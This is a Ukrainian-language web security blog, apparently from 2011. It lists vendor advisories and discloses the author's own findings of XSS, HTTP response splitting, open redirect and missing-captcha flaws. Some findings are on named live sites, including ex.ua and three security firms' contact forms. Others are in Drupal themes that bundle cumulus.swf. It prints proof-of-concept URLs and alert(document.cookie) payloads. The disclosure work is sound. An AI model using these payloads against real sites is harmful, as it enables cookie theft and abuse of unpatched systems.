Websecurity - Веб безпека

В даній добірці уразливості в веб додатках:

• HP 3COM/H3C Intelligent Management Center tftpserver WRQ Remote Code Execution Vulnerability (деталі)
• Multiple XSS vulnerabilities in CosmoShop (деталі)
• HP 3COM/H3C Intelligent Management Center img Remote Code Execution Vulnerability (деталі)
• XSS vulnerability in CosmoShop (деталі)
• HP 3COM/H3C Intelligent Management Center tftpserver DATA/ERROR Remote Code Execution Vulnerability (деталі)
• SAP NetWeaver Integration Directory - multiple XSS (деталі)
• HP Intelligent Management Center (IMC), Remote Execution of Arbitrary Code (деталі)
• SAP NetWeaver Runtime - multiple XSS (деталі)
• HP/Palm webOS, Execution of Arbitrary Code, Denial of Service (DoS), Unauthorized File System Write Access (деталі)
• SugarCRM list privilege restriction bypass (деталі)

13.01.2011

У жовтні, 25.10.2010, я знайшов HTTP Response Splitting, Cross-Site Scripting та Redirector уразливості на проекті http://www.ex.ua (файлообмінник). Про що найближчим часом сповіщу адміністрацію проекту.

Раніше я вже писав про уразливість на www.ex.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

07.10.2011

HTTP Response Splitting:

http://www.ex.ua/delete_object/1?back=http://1%0AHeader:1

XSS (через HTTP Response Splitting):

• alert(document.cookie)
• цікавий

Redirector (URL Redirector Abuse):

http://www.ex.ua/delete_object/1?back=http://websecurity.com.ua

Дані уразливості досі не виправлені. Що дуже типово для ламерів-адмінів цього сайта.

В даній добірці уразливості в веб додатках:

• HP 3COM/H3C Intelligent Management Center tftpserver mode Remote Code Execution Vulnerability (деталі)
• Re: Cross-Site Scripting vulnerability in Nagios (деталі)
• HP 3COM/H3C Intelligent Management Center imcsyslogdm Remote Code Execution Vulnerability (деталі)
• Air Contacts Lite (iPhone / iPod App Denial Of Service) (деталі)
• HP 3COM/H3C Intelligent Management Center tftpserver opcode_table Remote Code Execution Vulnerability (деталі)
• Cross-Site Scripting vulnerability in Nagios (деталі)
• HP 3COM/H3C Intelligent Management Center dbman sprintf Remote Code Execution Vulnerability (деталі)
• SQL injection vulnerability in CosmoShop (деталі)
• VMware vCenter Server and vSphere Client security vulnerabilities (деталі)
• XSS vulnerability in CosmoShop (деталі)

10.01.2011

У жовтні, 15.10.2010, я знайшов Insufficient Anti-automation та Cross-Site Scripting уразливості на http://www.bezpeka-service.com.ua - сайті секюріті компанії. Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже писав про уразливість на www.bezpeka-service.com.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

06.10.2011

Insufficient Anti-automation:

На сторінці контактів (http://www.bezpeka-service.com.ua/_kontakti_0_5_menu_0_2.html) немає захисту від автоматизованих запитів (капчі).

XSS:

POST запит на сторінці http://www.bezpeka-service.com.ua/_kontakti_0_5_menu_0_2.html
<script>alert(document.cookie)</script>В полях: ФИО, E-mail, Телефон, Тема письма, Текст.

Дані уразливості досі не виправлені.

В даній добірці уразливості в веб додатках:

• Sybase M-Business Anywhere agSoap.exe password Tag Remote Code Execution Vulnerability (деталі)
• Mutare Software EVM - CSRF and XSS Vulnerabilities (деталі)
• Sybase M-Business Anywhere Server agd.exe encodeUsername Remote Code Execution Vulnerability (деталі)
• InSite Troubleshooting Cross-Site Scripting (деталі)
• Sybase M-Business Anywhere agd.exe username Parameter Remote Code Execution Vulnerability (деталі)
• Kodak InSite Login Page Cross-Site Scripting (деталі)
• Security Notice for CA eHealth (деталі)
• Cross-Site Scripting vulnerabilities in Icinga (деталі)
• Oracle GlassFish Server Administration Console Authentication Bypass (деталі)
• RecordPress Multiple Vulnerabilities (деталі)

08.01.2011

У жовтні, 15.10.2010, я знайшов Insufficient Anti-automation та Cross-Site Scripting уразливості на http://scb-ua.com - сайті секюріті компанії. Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже писав про уразливості на www.scb-ua.com.

Детальна інформація про уразливості з’явиться пізніше.

05.10.2011

Insufficient Anti-automation:

На сторінці контактів (http://scb-ua.com/_kontakty_i_karta_proezda_0_11_menu_0_1.html) немає захисту від автоматизованих запитів (капчі).

XSS:

POST запит на сторінці http://scb-ua.com/_kontakty_i_karta_proezda_0_11_menu_0_1.html
<script>alert(document.cookie)</script>В полях: ФИО, E-mail, Телефон, Тема письма, Текст.

Зараз даний сайт, який належить секюріті фірмі, не працює (мабуть вони вірішили, що найбільш безпечно взагалі не мати сайта). А на домені scb-ua.com знаходиться зовсім інший сайт, в якому дірок також вистачає .

В даній добірці уразливості в веб додатках:

• SAP WebAS ITS Mobile Test Service Multiple Vulnerabilities (деталі)
• Path disclosure in PrestaShop (деталі)
• SAP WebAS ITS Mobile Start Service Multiple Vulnerabilities (деталі)
• TOTVS ERP Microsiga Protheus - Users Enumeration (деталі)
• Proofpoint Protection Server Cross-Site Scripting Vulnerability (деталі)
• LMS Web Ensino - Multiple XSS, Session Fixation, CSRF and SQL Injection (деталі)
• Client Side Authorization ZyXEL ZyWALL USG Appliances Web Interface (деталі)
• ‘Quick Polls’ Local File Inclusion & Deletion Vulnerabilities (деталі)
• Authentication Bypass in Configuration Import and Export of ZyXEL ZyWALL USG Appliances (деталі)
• XSS in CubeCart <= 2.0.7 (деталі)

07.01.2011

У жовтні, 15.10.2010, я знайшов Insufficient Anti-automation та Cross-Site Scripting уразливості на http://varta.net.ua - сайті секюріті компанії. Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже писав про уразливість на varta.net.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

04.10.2011

Insufficient Anti-automation:

На сторінці контактів (http://varta.net.ua/index.php?lang_id=1 &menu_id=8) немає захисту від автоматизованих запитів (капчі).

XSS:

POST запит на сторінці http://varta.net.ua/index.php?lang_id=1&menu_id=8
<script>alert(document.cookie)</script>В полях: ФИО, E-mail, Телефон, Тема письма, Текст.

Дані уразливості досі не виправлені.

В даній добірці уразливості в веб додатках:

• HP Network Automation Running on Linux, Solaris, and Windows, Remote Information Disclosure (деталі)
• Path disclosure in Tribiq CMS (деталі)
• HP OpenView Storage Data Protector, Remote Execution of Arbitrary Code (деталі)
• XSS vulnerability in xtcModified (деталі)
• Cisco Unified CallManager xmldirectorylist.jsp SQL Injection Vulnerability (деталі)
• XSS vulnerability in xtcModified (деталі)
• Cisco Security Advisory: Multiple Vulnerabilities in Cisco Unified Communications Manager (деталі)
• XSS vulnerability in xtcModified (деталі)
• RSA, The Security Division of EMC, announces a fix for a security vulnerability in RSA Data Loss Prevention (деталі)
• XSS vulnerability in xtcModified (деталі)

Раніше я вже писав про уразливість в плагінах для Serendipity, Social Web CMS, PHP-Fusion, Magento та Sweetcron. А також писав про аналогічну уразливість в багатьох плагінах для різних движків, в тому числі в Cumulus для Drupal.

Така ж уразливість є і в багатьох темах для Drupal, що використовують cumulus.swf (це той самий файл tagcloud.swf розроблений автором WP-Cumulus). Про мільйони флешек tagcloud.swf вразливих до XSS атак я згадував у своїй статті XSS уразливості в 34 мільйонах флеш файлах.

Сьогодні я знайшов Cross-Site Scripting уразливість в багатьох темах для Drupal. Зокрема вразливі теми Admire Grunge, Morok, Pushbutton, Danland і Analytic. Всі теми для Друпал (як і для інших движків), що використовують дану флешку, є вразливими. Про що найближчим часом повідомлю розробникам.

XSS:

http://site/themes/admire_grunge/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
http://site/themes/morok/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
http://site/themes/pushbutton/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
http://site/sites/all/themes/danland/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
http://site/themes/analytic/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Код виконається при кліку. Це Strictly social XSS. Також можна провести HTML Injection атаку, подібно до WP-Cumulus.

Уразливі всі версії тем Admire Grunge, Morok, Pushbutton, Danland і Analytic для Drupal.